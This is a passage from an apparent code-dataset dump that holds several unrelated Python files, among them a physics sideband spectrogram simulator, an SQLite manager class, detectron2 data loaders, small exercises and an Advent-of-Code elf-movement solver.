----\n\n # Step 0: make a copy of the gain noise file.\n gain_noise_path = Path(gain_noise_path)\n gain_noise_path_sideband = gain_noise_path.with_name(\n gain_noise_path.stem + f\"_{name}\" + gain_noise_path.suffix\n )\n shutil.copyfile(str(gain_noise_path), str(gain_noise_path_sideband))\n\n # Step 1: alter the gain_noise file.\n congifure_gain_noise_csv(gain_noise_path_sideband)\n\n # ---- Build spec files ----\n config = Config(config_path_sideband)\n\n # Change default settings of config to match input args.\n config.daq.gain_noise_csv_path = gain_noise_path_sideband\n config.daq.spec_length = spec_length\n config.daq.random_seed = random_seed\n\n\n # Extract necessary parameters from config.\n spec_length = config.daq.spec_length\n freq_bw = config.daq.freq_bw\n\n # Build the track set to be simulated.\n tracks = build_sideband_track_set(\n n_files, n_events_per_file, spec_length, freq_bw, random_seed\n )\n\n # Build the simulated spec files.\n daq = DAQ(config)\n daq.run(tracks)\n\n if sanity_check:\n \n # ---- Visuzlize first spec file ----\n file_in_acq = 0\n spec_path = daq.spec_file_paths[file_in_acq]\n spec_array = daq.spec_to_array(spec_path, slices=-1)\n plot_sparse_spec(spec_array, spec_length, freq_bw)\n plot_tracks(tracks, file_in_acq, freq_bw)\n plot_noise_gain(config.daq.gain_noise_csv_path)\n\n print(f\"\\n\\n\\nDone building simple dataset.\")\n\n return None\n\n\ndef build_sideband_track_set(n_files, n_events_per_file, spec_length, freq_bw, seed):\n\n rng = np.random.default_rng(seed)\n\n n_events = n_files * n_events_per_file\n\n file_in_acq = rng.integers(low=0, high=n_files, size=n_events)\n event_num = np.arange(0, n_events, 1)\n time_start = rng.uniform(low=0, high=spec_length, size=n_events)\n time_stop = np.array([spec_length] * n_events)\n\n freq_start = rng.uniform(low=100e6, high=freq_bw, size=n_events)\n slope = rng.normal(loc=1e11, scale=1e10, size=n_events)\n freq_stop = freq_start + slope * (time_stop - time_start)\n\n band_power_start = np.array([80e-15] * n_events)\n band_power_stop = band_power_start\n band_num = np.array([0] * n_events)\n\n h = rng.uniform(low=.9, high=1.1, size=n_events)\n print(f\"h: {h}\")\n axial_freq = rng.uniform(low=60e6, high=100e6, size=n_events)\n\n segments = pd.DataFrame(\n {\n \"file_in_acq\": file_in_acq,\n \"event_num\": event_num,\n \"time_start\": time_start,\n \"time_stop\": time_stop,\n \"freq_start\": freq_start,\n \"freq_stop\": freq_stop,\n \"slope\": slope,\n \"band_power_start\": band_power_start,\n \"band_power_stop\": band_power_stop,\n \"band_num\": band_num,\n \"h\": h,\n \"axial_freq\": axial_freq,\n }\n )\n\n tracks = process_segments(segments)\n\n\n return tracks\n\n\ndef plot_noise_gain(gain_noise_csv_path):\n pd.read_csv(gain_noise_csv_path).set_index(\"freq\").plot.line()\n plt.show()\n return None\n\n\ndef plot_sparse_spec(spec_array, spec_length, freq_bw, snr_cut=5):\n\n cut_condition = np.array(\n (spec_array > spec_array.mean(axis=0) * snr_cut).T, dtype=float\n )\n extent = [0, spec_length, 0, freq_bw]\n\n fig, ax = plt.subplots(figsize=(12, 8))\n\n ax.imshow(\n 1 - cut_condition,\n origin=\"lower\",\n aspect=\"auto\",\n interpolation=None,\n cmap=\"gray\",\n extent=extent,\n )\n\n ax.set_title(\"Sparse Spectrogram\")\n ax.set_xlabel(\"Time (s)\")\n ax.set_ylabel(\"Freq (Hz)\")\n plt.show()\n\n return None\n\n\ndef plot_tracks(tracks, file_in_acq, freq_bw):\n\n condition = tracks.file_in_acq == file_in_acq\n\n fig, ax = plt.subplots(figsize=(12, 8))\n\n for index, row in 
tracks[condition].iterrows():\n\n time_coor = np.array([row[\"time_start\"], row[\"time_stop\"]])\n freq_coor = np.array([row[\"freq_start\"], row[\"freq_stop\"]])\n if np.abs(row.band_num) == 1:\n ax.plot(\n time_coor,\n freq_coor,\n \"ro-\",\n markersize=0.5,\n alpha=0.5,\n )\n if np.abs(row.band_num) == 0:\n ax.plot(\n time_coor,\n freq_coor,\n \"yo-\",\n markersize=0.5,\n alpha=0.5,\n )\n ax.set_ylim(0, freq_bw)\n ax.set_title(\"tracks\")\n ax.set_xlabel(\"Time (s)\")\n ax.set_ylabel(\"Freq (Hz)\")\n plt.show()\n\n return None\n\n\ndef process_segments(segments):\n\n sideband_num = 1\n # Build the segments into tracks.\n band_list = []\n for segment_index, row in segments.iterrows():\n\n # sideband_calc(avg_cycl_freq, axial_freq, h, num_sidebands=sideband_num)\n sideband_amplitudes = sideband_calc(\n row.freq_start, row.axial_freq, row.h, num_sidebands=sideband_num\n )[0]\n\n for i, band_num in enumerate(range(-sideband_num, sideband_num + 1)):\n\n # copy segment in order to fill in band specific values\n row_copy = row.copy()\n\n # fill in new avg_cycl_freq, band_power, band_num\n row_copy[\"freq_start\"] = sideband_amplitudes[i][0]\n row_copy[\"freq_stop\"] = row_copy[\"freq_start\"] + row_copy[\"slope\"] * (\n row_copy[\"time_stop\"] - row_copy[\"time_start\"]\n )\n # Note that the sideband amplitudes need to be squared to give power.\n row_copy[\"band_power_start\"] = (\n sideband_amplitudes[i][1] ** 2 * row.band_power_start\n )\n row_copy[\"band_power_stop\"] = row_copy[\"band_power_start\"]\n row_copy[\"band_num\"] = band_num\n\n print(row_copy)\n # append to band_list, as it's better to grow a list than a df\n band_list.append(row_copy.tolist())\n\n bands_df = pd.DataFrame(band_list, columns=segments.columns)\n\n return bands_df\n\n\ndef congifure_gain_noise_csv(csv_path):\n\n # Sinusoidal gain:\n col = \"gain\"\n\n array = np.array([1.0] * 4096)\n update_gain_noise_csv(csv_path, col, array)\n\n # Flat noise:\n col = \"noise_mean\"\n\n array = np.array([1.0] * 4096)\n\n update_gain_noise_csv(csv_path, col, array)\n\n\ndef update_gain_noise_csv(csv_path, col, array):\n \"\"\"\n Helper function for editing gain_noise.csv.\n \"\"\"\n noise_gain_df = pd.read_csv(csv_path)\n noise_gain_df[col] = array\n noise_gain_df.to_csv(csv_path, index=False)\n\n return None\n\n\n# ---- Functions for sideband creation ----\n\n\ndef format_sideband_array(\n sidebands_one, avg_cyc_freq, axial_freq, mod_index=np.nan, num_sidebands=1\n):\n \"\"\"Does formatting for array with list of sideband magnitudes (normalized), and their start frequencies.\n Takes in 1-sided list of sideband magnitudes\n \"\"\"\n # Calculate (2-sided) list of (frequency, amplitude) of sidebands\n sidebands = []\n\n for k in range(-num_sidebands, num_sidebands + 1):\n freq = avg_cyc_freq + k * axial_freq\n magnitude = sidebands_one[abs(k)]\n pair = (freq, magnitude)\n sidebands.append(pair)\n\n ### Intentionally returns modulation index of nan as it is only (meaningfully) defined for harmonic traps\n return sidebands, mod_index\n\n\ndef sideband_calc(avg_cycl_freq, axial_freq, h, num_sidebands=1):\n\n \"\"\"Calculates relative magnitudes of num_sidebands sidebands from\n average cyclotron frequency (avg_cycl_freq), axial frequency\n (axial_freq), and maximum axial amplitude (zmax).\n \"\"\"\n\n sidebands = [abs(ss.jv(k, h)) for k in range(num_sidebands + 1)]\n return format_sideband_array(sidebands, avg_cycl_freq, axial_freq, h, num_sidebands)\n\n\nif __name__ == \"__main__\":\n 
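# entry point: parse the CLI arguments, then build the sideband training dataset (and optional sanity-check plots)\n    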
main()\n","repo_name":"Helium6CRES/he6-cres-deep-learning","sub_path":"build_sideband_ds.py","file_name":"build_sideband_ds.py","file_ext":"py","file_size_in_byte":10636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14491159429","text":"import bitstring\n\ndef isSubnormal(a):\n\tb = bitstring.pack('>d', a)\n\tsbits = b[0:1]\n\tebits = b[1:12]\n\tmbits = b[12:]\n\tminExp = bitstring.BitArray(bin='00000000000')\n\t\n\tzero = 0\n\tpack_zero = bitstring.pack('>d', zero)\n\tmbits_zero = pack_zero[12:]\n\n\tif ebits.bin == minExp.bin and mbits.bin != mbits_zero.bin :\n\t\treturn True\n\telse:\n\t\treturn False\n","repo_name":"kcwanglucky/ORIE-5270","sub_path":"HW4/detectSubnormalNumber.py","file_name":"detectSubnormalNumber.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23362868287","text":"\"\"\"\r\nArguments passed by value or by reference\r\n\"\"\"\r\ndef doblar_valor(numero):\r\n    return numero * 2\r\n\r\nn = 5\r\nn = doblar_valor(n)# passed by value\r\n\r\nprint(n)\r\n\r\ndef doblar_valores(numeros):\r\n    for i,n in enumerate(numeros):\r\n        numeros[i] *= 2\r\n\r\nn = [5,10,15,20]\r\ndoblar_valores(n[:])# by value: pass a copy (n[:]) | by reference: pass the list itself (n)\r\n\r\nprint(n)","repo_name":"Matius2002/Programacion-en-Python","sub_path":"funciones/ArgumentosPorValoroPorReferencia.py","file_name":"ArgumentosPorValoroPorReferencia.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10351817107","text":"import subprocess\n\nimport pytest\n\n\n@pytest.fixture\ndef installed_cookiejar(cookiejar_examples):\n    path = str(cookiejar_examples.project)\n\n    subprocess.call([\"git\", \"init\", path])\n    subprocess.call([\"pip\", \"install\", path])\n\n    return cookiejar_examples\n\n\ndef test_examples_present(installed_cookiejar):\n    cj = installed_cookiejar\n\n    import packagename\n\n    primes = packagename.do_primes(10)\n\n    assert primes == [2, 3, 5, 7, 11, 13, 17, 19, 23, 29]\n\n    if cj.context['use_compiled_extensions']:\n        cprimes = packagename.do_primes(10, usecython=True)\n\n        assert primes == cprimes\n\n\n","repo_name":"HERMES-SOC/instrument-package-template","sub_path":"tests/test_package.py","file_name":"test_package.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73382991732","text":"n=int(input(\"enter no.\"))\r\nx=n\r\ns=0\r\nc=len(str(n))\r\nwhile(x>0):\r\n    r=x%10\r\n    s=s+r**c\r\n    x=x//10\r\nif(n==s):\r\n    print(\"armstrong\")\r\nelse:\r\n    print(\"not\")\r\n","repo_name":"kajalrathore24/PYTHON-LAB","sub_path":"armstrong.py","file_name":"armstrong.py","file_ext":"py","file_size_in_byte":164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9071928468","text":"# install SQLAlchemy\n\nimport sqlalchemy.engine\n\nfrom RMLibs.basic.BasicObject import BasicObject\nimport sqlalchemy as db\n\n\nclass SQLiteManager(BasicObject):\n    \"\"\"\n    SQLite database manager\n    \"\"\"\n\n    __PREFIX = \"sqlite:///\"\n\n    __file_name: str or None = None\n    __connected: bool = False\n    __conn: sqlalchemy.engine.Connection or None = None\n    __engine: sqlalchemy.engine.Engine or None = None\n\n    @property\n    def file_name(self) -> str:\n        \"\"\"\n        :return: the name of the SQLite database file\n        \"\"\"\n        return 
self.__file_name\n\n @file_name.setter\n def file_name(self, file_name: str):\n \"\"\"\n sets the name of the SQLite database file\n :param file_name: full path to the db file\n \"\"\"\n self.__file_name = file_name\n\n @property\n def connected(self) -> bool:\n \"\"\"\n :return: True if the connection to the db is open\n \"\"\"\n return self.__connected\n\n @property\n def metadata(self) -> sqlalchemy.MetaData:\n if not self.connected:\n raise Exception(\"The connection is not open\")\n return db.MetaData(self.__engine)\n\n def __del__(self):\n \"\"\"\n Destructor\n \"\"\"\n if self.connected:\n self.close_connection()\n\n def open_connection(self):\n \"\"\"\n Opens the connection to the database file\n \"\"\"\n try:\n if self.connected:\n raise Exception(\"The connection is open yet\")\n self.__engine = db.create_engine(self.__PREFIX + self.file_name)\n self.__conn = self.__engine.connect()\n self.__connected = True\n except Exception as ex:\n self.error('.open_connection(self) - ' + str(ex))\n raise ex\n\n def close_connection(self):\n \"\"\"\n Closes the open connection\n \"\"\"\n try:\n if not self.connected:\n raise Exception(\"The connection is not open\")\n self.__conn.close()\n self.__connected = False\n except Exception as ex:\n self.error('.close_connection(self) - ' + str(ex))\n raise ex\n\n def create_table_if_not_exists(self, table: sqlalchemy.Table):\n try:\n if not self.connected:\n raise Exception(\"The connection is not open\")\n if not self.__engine.dialect.has_table(self.__conn, table.name):\n self.debug_verbose(\".create_table_if_not_exists(self, table: sqlalchemy.Table) - Creating table \" + table.name)\n table.metadata.create_all()\n else:\n self.debug_verbose(\".create_table_if_not_exists(self, table: sqlalchemy.Table) - Table \" + table.name + \" already exists\")\n\n except Exception as ex:\n self.error('.create_table_if_not_exists(self, table: sqlalchemy.Table) - ' + str(ex))\n raise ex\n","repo_name":"rmarino72/PyLibs","sub_path":"RMLibs/database/SQLiteManager.py","file_name":"SQLiteManager.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7519669521","text":"import os\n\nfrom xdg.BaseDirectory import xdg_data_dirs\n\nfrom photofs._image import FileBasedImage\nfrom photofs._source import ImageSource, FileBasedImageSource\n\n\n# Try to import sqlite\ntry:\n import sqlite3\nexcept ImportError:\n sqlite = None\n\n\n@ImageSource.register('shotwell')\nclass ShotwellSource(FileBasedImageSource):\n \"\"\"Loads images and videos from Shotwell.\n \"\"\"\n def __init__(self, *args, **kwargs):\n if sqlite3 is None:\n raise RuntimeError('This program requires sqlite3')\n super(ShotwellSource, self).__init__(*args, **kwargs)\n\n @property\n def default_location(self):\n \"\"\"Determines the location of the *Shotwell* database.\n\n :return: the location of the database, or ``None`` if it cannot be\n located\n :rtype: str or None\n \"\"\"\n for d in xdg_data_dirs:\n result = os.path.join(d, 'shotwell', 'data', 'photo.db')\n if os.access(result, os.R_OK):\n return result\n\n def load_tags(self):\n db = sqlite3.connect(self._path)\n try:\n # The descriptions of the different image tables; the value tuple\n # is the header of the ID in the tag table, the map of IDs to\n # images and whether the table contains videos\n db_tables = {\n 'phototable': ('thumb', {}, False),\n 'videotable': ('video-', {}, True)}\n\n # Load the images\n for table_name, (header, images, is_video) in 
db_tables.items():\n results = db.execute(\"\"\"\n SELECT id, filename, exposure_time, title\n FROM %s\"\"\" % table_name)\n for r_id, r_filename, r_exposure_time, r_title in results:\n try:\n images[r_id] = FileBasedImage(\n r_title,\n r_filename,\n r_exposure_time,\n is_video)\n except OSError:\n # Ignore unreadable files\n pass\n\n # Load the tags\n results = db.execute(\"\"\"\n SELECT name, photo_id_list\n FROM tagtable\n ORDER BY name\"\"\")\n for r_name, r_photo_id_list in results:\n # Ignore unused tags\n if not r_photo_id_list:\n continue\n\n # Hierachial tag names start with '/'\n path = r_name.split('/') if r_name[0] == '/' else ['', r_name]\n path_name = os.path.sep.join(path)\n\n # Make sure that the tag and all its parents exist\n tag = self._make_tags(path_name)\n\n # The IDs are all in the text of photo_id_list, separated by\n # commas; there is an extra comma at the end\n ids = r_photo_id_list.split(',')[:-1]\n\n # Iterate over all image IDs and move them to this tag\n for i in ids:\n if i[0].isdigit():\n # If the first character is a digit, this is a legacy\n # source ID and an ID in the photo table\n image = db_tables['phototable'][1].get(int(i))\n else:\n # Iterate over all database tables and locate the image\n # instance for the current ID\n image = None\n for table_name, (header, images, is_video) \\\n in db_tables.items():\n if not i.startswith(header):\n continue\n image = images.get(int(i[len(header):], 16))\n break\n\n # Verify that the tag only references existing images\n if image is None:\n continue\n\n # Remove the image from the parent tags\n parent = tag.parent\n while parent:\n for k, v in list(parent.items()):\n if v == image:\n del parent[k]\n parent = parent.parent\n\n # Finally add the image to this tag\n tag.add(image)\n\n finally:\n db.close()\n","repo_name":"moses-palmer/photofs","sub_path":"lib/photofs/sources/shotwell.py","file_name":"shotwell.py","file_ext":"py","file_size_in_byte":4429,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"21"} +{"seq_id":"22167927244","text":"import numpy as np\n\nimport torch.utils\n\nfrom detectron2.data import get_detection_dataset_dicts, DatasetFromList\nfrom detectron2.data import MapDataset, samplers\nfrom detectron2.utils.env import seed_all_rng\nfrom detectron2.modeling import build_model\nfrom detectron2.checkpoint import DetectionCheckpointer\n\nfrom kernelphysiology.dl.pytorch.datasets.dataset_mapper import DatasetMapper\n\n\ndef worker_init_reset_seed(worker_id):\n seed_all_rng(np.random.randint(2 ** 31) + worker_id)\n\n\ndef trivial_batch_collator(batch):\n \"\"\"\n A batch collator that does nothing.\n \"\"\"\n return batch\n\n\ndef setup(opts, cfg_file=None):\n \"\"\"\n Create configs and perform basic setups.\n \"\"\"\n from kernelphysiology.dl.pytorch.configs.defaults import _C\n cfg = _C.clone()\n if cfg_file is not None:\n cfg.merge_from_file(cfg_file)\n cfg.merge_from_list(opts)\n cfg.freeze()\n # default_setup(cfg, args)\n return cfg\n\n\ndef get_coco_test(batch_size, opts, cfg_file):\n cfg = setup(opts, cfg_file)\n dataset_name = 'coco_2017_val_panoptic_separated'\n dataset_dicts = get_detection_dataset_dicts(\n [dataset_name],\n filter_empty=False,\n proposal_files=None,\n )\n\n dataset = DatasetFromList(dataset_dicts)\n mapper = DatasetMapper(cfg, False)\n dataset = MapDataset(dataset, mapper)\n\n sampler = samplers.InferenceSampler(len(dataset))\n batch_sampler = torch.utils.data.sampler.BatchSampler(\n sampler, batch_size, drop_last=False\n )\n\n 
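# detectron2 models consume a list[dict] per batch rather than stacked tensors, so trivial_batch_collator (defined above) hands the sampled list through unchanged\n    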
data_loader = torch.utils.data.DataLoader(\n dataset,\n num_workers=4,\n batch_sampler=batch_sampler,\n collate_fn=trivial_batch_collator,\n )\n return data_loader\n\n\ndef get_coco_train(batch_size, opts, cfg_file):\n cfg = setup(opts, cfg_file)\n dataset_dicts = get_detection_dataset_dicts(\n cfg.DATASETS.TRAIN,\n filter_empty=cfg.DATALOADER.FILTER_EMPTY_ANNOTATIONS,\n min_keypoints=cfg.MODEL.ROI_KEYPOINT_HEAD.MIN_KEYPOINTS_PER_IMAGE\n if cfg.MODEL.KEYPOINT_ON\n else 0,\n proposal_files=cfg.DATASETS.PROPOSAL_FILES_TRAIN if cfg.MODEL.LOAD_PROPOSALS else None,\n )\n\n dataset = DatasetFromList(dataset_dicts, copy=False)\n\n mapper = DatasetMapper(cfg, True)\n dataset = MapDataset(dataset, mapper)\n\n sampler = samplers.TrainingSampler(len(dataset))\n batch_sampler = torch.utils.data.sampler.BatchSampler(\n sampler, batch_size, drop_last=True\n )\n # drop_last so the batch always have the same size\n train_loader = torch.utils.data.DataLoader(\n dataset,\n num_workers=4,\n batch_sampler=batch_sampler,\n collate_fn=trivial_batch_collator,\n worker_init_fn=worker_init_reset_seed,\n )\n\n return train_loader\n\n\ndef get_panoptic_network(opts, cfg_file, net_path):\n cfg = setup(opts, cfg_file)\n net = build_model(cfg)\n checkpointer = DetectionCheckpointer(net)\n checkpointer.load(net_path)\n net.train()\n return net\n","repo_name":"ArashAkbarinia/kernelphysiology","sub_path":"python/src/kernelphysiology/dl/experiments/intrasimilarity/panoptic_utils.py","file_name":"panoptic_utils.py","file_ext":"py","file_size_in_byte":2966,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"73277980531","text":"import unittest\nfrom unittest import TestCase\nfrom unittest.mock import patch\nimport bitcoin\n\nclass TestBitCoin(TestCase):\n @patch ('bitcoin.get_bitcoin_exchange')\n def test_convert_btc_to_dollars(self, mock_response):\n mock_response.return_value = 987789.121654\n\n expected = mock_response.return_value * 50\n exchange = bitcoin.get_bitcoin_exchange()\n actual = bitcoin.get_dollar_amount(50, exchange)\n self.assertAlmostEqual(expected, actual) #couldn't get the test to work with assertEqual--assertAlmostEqual works fine\nif __name__ == '__main__':\n unittest.main()","repo_name":"qdaniel4/moreUniteTestingLab","sub_path":"test_bitcoin.py","file_name":"test_bitcoin.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12712372804","text":"from tkinter import *\nfrom tkinter import messagebox\nfrom metodos import *\n\n\nclass JanelaPrincipal:\n \"\"\"\"\" Janela Principal da aplicação \"\"\"\"\"\n\n def __init__(self):\n self.label_questao = []\n self.gabarito = []\n self.alternativas = []\n self.respostas = []\n self.porcentagem = []\n\n self.principal = Tk()\n self.principal.title(\"Correção de Prova Somatoria\")\n\n # Criando os Frames Principais\n self.frame_head = Frame(self.principal)\n self.frame_head.pack()\n self.frame_questao = Frame(self.principal)\n self.frame_questao.pack()\n self.frame_resultado = Frame(self.principal)\n self.frame_resultado.pack(side=RIGHT)\n\n # Configurando o Header\n Label(self.frame_head, text=\"Correção de Provas Somatórias\", font=\"Helvetica 14 bold\") \\\n .grid(row=0, column=0, padx=10, pady=10, columnspan=5)\n Label(self.frame_head, text=\"Escolha o tipo de prova\", font=\"Helvetica 10\") \\\n .grid(row=1, column=0, padx=5, pady=5)\n\n # Configurando Radio Botton\n self.tipo_prova = IntVar()\n 
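# tipo_prova holds the selected correction method (tipo 1 or tipo 2); default to type 1\n        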
self.tipo_prova.set(1)\n self.rb_t1 = Radiobutton(self.frame_head, text=\"Tipo 1\", value=1, variable=self.tipo_prova)\n self.rb_t1.grid(row=1, column=1, padx=5, pady=5)\n self.rb_t2 = Radiobutton(self.frame_head, text=\"Tipo 2\", value=2, variable=self.tipo_prova)\n self.rb_t2.grid(row=1, column=2, padx=5, pady=5)\n # Butão de ajuda falta iplementar\n self.img_ajuda = PhotoImage(file=\"./img/ajuda.png\")\n Button(self.frame_head, image=self.img_ajuda,\n command=lambda: messagebox.showinfo(\"Ajuda\",\n \"Tipo 1: Proma somatóra onde uma alternativa errada marcada \"\n \"como certa anula a questão completamente:\\n\\n\\n\"\n \"Tipo 2: Prova somatória que ultiliza como método de corre\"\n \"ção a formula:\\n\\n\"\n \"Se NPC>NPI\\n\"\n \"P = NP-(NTPC-(NPC-NPI))/NP\\n\"\n \"Se não P=0\\n\\n\"\n \"Onde:\\n\"\n \"P – Pontuação do candidato na questão\\n\"\n \"NP – Número de proposições da questão\\n\"\n \"NTPC – Número total de proposições corretas\\n\"\n \"NPC – Número de proposições corretas consideradas corretas pelo candidato\\n\"\n \"NPI – Número de proposições incorretas consideradas corretas pelo candidato\\n\"\n )).grid(row=1, column=3, padx=5, pady=5)\n\n # Adicionar as questões\n\n Label(self.frame_head, text=\"Quantidade de questões\").grid(row=2, column=0, padx=5, pady=5)\n self.img_mais = PhotoImage(file=\"./img/mais.png\")\n self.img_menos = PhotoImage(file=\"./img/menos.png\")\n Button(self.frame_head, image=self.img_mais, anchor=E, command=lambda: self.add_questao()).grid(row=2, column=1)\n Button(self.frame_head, image=self.img_menos, anchor=W, command=lambda: self.remover_questao()).grid(row=2,\n column=2)\n Button(self.frame_head, anchor=W, text=\"Corrigir\", command=lambda: self.corrigir()).grid(row=2, column=3)\n Label(self.frame_questao, text=\"Questão:\", font=\"Helvetica 10 bold\", anchor=\"center\").grid(row=0, column=0,\n padx=5, pady=5)\n Label(self.frame_questao, text=\"Nº de Alternativas:\", font=\"Helvetica 10 bold\", anchor=\"center\").grid(row=0,\n column=1,\n pady=5,\n padx=5)\n Label(self.frame_questao, text=\"Gabarito:\", font=\"Helvetica 10 bold\", anchor=\"center\").grid(row=0, column=2,\n pady=5, padx=5)\n Label(self.frame_questao, text=\"Resposta:\", font=\"Helvetica 10 bold\", anchor=\"center\").grid(row=0, column=3,\n pady=5, padx=5)\n Label(self.frame_questao, text=\"Porcentagem:\", font=\"Helvetica 10 bold\", anchor=\"center\").grid(row=0, column=4,\n pady=5, padx=5)\n\n # Loop inserindo as questões\n self.add_questao()\n\n # Bloco do resultado\n Label(self.frame_resultado, text=\"Resultado:\", font=\"Helvetica 10 bold\", anchor=\"center\").pack(side=LEFT,\n padx=5, pady=5)\n self.resultado = Label(self.frame_resultado, text=\"\", background=\"white\", width=15, borderwidth=1,\n relief=\"groove\")\n self.resultado.pack(side=RIGHT, padx=5, pady=5)\n\n # fim da janela\n self.principal.mainloop()\n\n def add_questao(self):\n alternativas_padrao = IntVar()\n alternativas_padrao.set(5)\n\n pos = len(self.label_questao) + 1\n temp = Label(self.frame_questao, text=f'Questão {pos}:', anchor=\"center\")\n self.label_questao.append(temp)\n self.label_questao[-1].grid(row=pos, column=0, padx=5, pady=5)\n temp = Entry(self.frame_questao, width=15, textvariable=alternativas_padrao, justify=CENTER)\n self.alternativas.append(temp)\n self.alternativas[-1].grid(row=pos, column=1, padx=5, pady=5)\n temp = Entry(self.frame_questao, width=15, justify=CENTER)\n self.gabarito.append(temp)\n self.gabarito[-1].grid(row=pos, column=2, padx=5, pady=5)\n temp = 
Entry(self.frame_questao, width=15, justify=CENTER)\n self.respostas.append(temp)\n self.respostas[-1].grid(row=pos, column=3, padx=5, pady=5)\n temp = Label(self.frame_questao, text=\"\", background=\"white\", width=15, borderwidth=1, relief=\"groove\")\n self.porcentagem.append(temp)\n self.porcentagem[-1].grid(row=pos, column=4, padx=5, pady=5)\n\n def remover_questao(self):\n if len(self.label_questao) > 1:\n self.label_questao[-1].destroy()\n del self.label_questao[-1]\n\n self.alternativas[-1].destroy()\n del self.alternativas[-1]\n\n self.gabarito[-1].destroy()\n del self.gabarito[-1]\n\n self.respostas[-1].destroy()\n del self.respostas[-1]\n\n self.porcentagem[-1].destroy()\n del self.porcentagem[-1]\n\n def corrigir(self):\n nota = 0\n\n try:\n for i in range(len(self.respostas)):\n\n if self.tipo_prova.get() == 1:\n r = corrigirMetodo1(int(self.gabarito[i].get()), int(self.respostas[i].get()),\n int(self.alternativas[i].get()))\n\n if r == 'false':\n messagebox.showerror(\"Erro:\", \"Gabarito ou Resposta não condiz com o número de alternativas\")\n else:\n self.porcentagem[i][\"text\"] = f\"{r:.2%}\"\n\n if self.tipo_prova.get() == 2:\n r = corrigirMetodo2(int(self.gabarito[i].get()), int(self.respostas[i].get()),\n int(self.alternativas[i].get()))\n if r == 'false':\n messagebox.showerror(\"Erro:\", \"Gabarito ou Resposta não condiz com o número de alternativas\")\n else:\n self.porcentagem[i][\"text\"] = f\"{r:.2%}\"\n\n nota = nota + r\n nota = nota / len(self.respostas)\n self.resultado[\"text\"] = f'{nota * 10:.1f}'\n except ValueError:\n messagebox.showerror(\"Erro\", \"Preencha todas as informações com números inteiros positivos\")\n\n\n\nif __name__ == '__main__':\n\n r = corrigirMetodo2(14,21,5)\n print(r)\n if r == 'false':\n print('nao foi')\n else:\n print('foi')\n\n","repo_name":"rafaelfbastos/correcao_provas_somatorias","sub_path":"janela_principal.py","file_name":"janela_principal.py","file_ext":"py","file_size_in_byte":8813,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41962120176","text":"import pandas as pd\n\ndata = pd.read_csv(\"/home/pyo/Downloads/module4/train_20000.csv\", names=['ID','product','a','b'])\ndata=data.drop(['a','b'],axis =1)\n\n\ncart = []\nID = data['ID'][0]\ntemp = []\nfor i in range(0,20000):\n\tif(ID==data['ID'][i]):\n\t\ttemp.append(data['product'][i])\n\telse:\n\t\tcart.append(temp)\n\t\ttemp=[]\n\t\tID=data['ID'][i]\n\t\ttemp.append(data['product'][i])\n\n\n","repo_name":"Pyohr/BigData-analysis","sub_path":"test_1.py","file_name":"test_1.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42443382693","text":"from collections import deque\nimport copy\n# Constants representing the possible states of a tile\nELF = '#'\nGROUND = '.'\n\ndirections = [(-1, 0, 'N'), (1, 0, 'S'), (0, -1, 'W'), (0, 1, 'E'), (-1, -1, 'NW'), (-1, 1, 'NE'), (1, -1, 'SW'), (1, 1, 'SE')]\nvalid_directions = deque([(-1, 0, 'N'), (1, 0, 'S'), (0, -1, 'W'), (0, 1, 'E')])\n\n# ___ _ _ _ _ \n# / __|___| |_ (_)_ _ (_) |_ _ __ ___ ___\n# | (_ / -_) _| | | ' \\| | _| | '_ \\/ _ (_-<\n# \\___\\___|\\__| |_|_||_|_|\\__| | .__/\\___/__/\n# |_| \n\ndef get_init_pos_elves(matrix: list) -> list:\n elves = []\n for i in range(len(matrix)):\n for j in range(len(matrix[i])):\n if matrix[i][j] == \"#\":\n elves.append((i,j))\n return elves\n\n# ___ _ _ ___ ___ ___ _ _ _ _ ___ _ _ _ _ _ ___ _ ___ ___ \n# / _ \\| \\| | 
__| | _ \\/ _ \\| | | | \\| | \\ | || | /_\\ | \\| | \\| | | __| _ \\\n# | (_) | .` | _| | / (_) | |_| | .` | |) | | __ |/ _ \\| .` | |) | |__| _|| /\n# \\___/|_|\\_|___| |_|_\\\\___/ \\___/|_|\\_|___/ |_||_/_/ \\_\\_|\\_|___/|____|___|_|_\\\n\ndef consider_move(grid, i, j):\n for dx, dy, direction in valid_directions: # directions define here as global variable\n \n if 0 <= i + dx <= height and 0 <= j + dy <= width:\n try:\n if not any(grid[i+di][j+dj] == ELF for di, dj in [(0, 1), (0, -1), (1, 0), (-1, 0), (-1, -1), (-1, 1), (1, -1), (1, 1)] if i+di >= 0 and i+di <= height and j + dj >= 0 and j + dj <= width):\n return None\n\n elif grid[i + dx][j + dy] == GROUND:\n if (direction == 'N' or direction == 'S') and grid[i + dx][j + 1 + dy] == GROUND and grid[i + dx][j - 1 + dy] == GROUND: \n return (i + dx, j + dy)\n\n if (direction == 'W' or direction == 'E') and grid[i + 1 + dx][j + dy] == GROUND and grid[i - 1 + dx][j + dy] == GROUND:\n return (i + dx, j + dy)\n except:\n continue\n\n return None # no valide moves found\n\ndef one_round_move_elves(grid, elves, round):\n flag = 0\n elves_check = copy.deepcopy(elves)\n # proposed_moves keys will be the proposed moves, and the value the initial value of elves before moving\n proposed_moves = {} # reset dict for each ROUND\n for i, j in elves:\n proposed_destination = consider_move(grid, i, 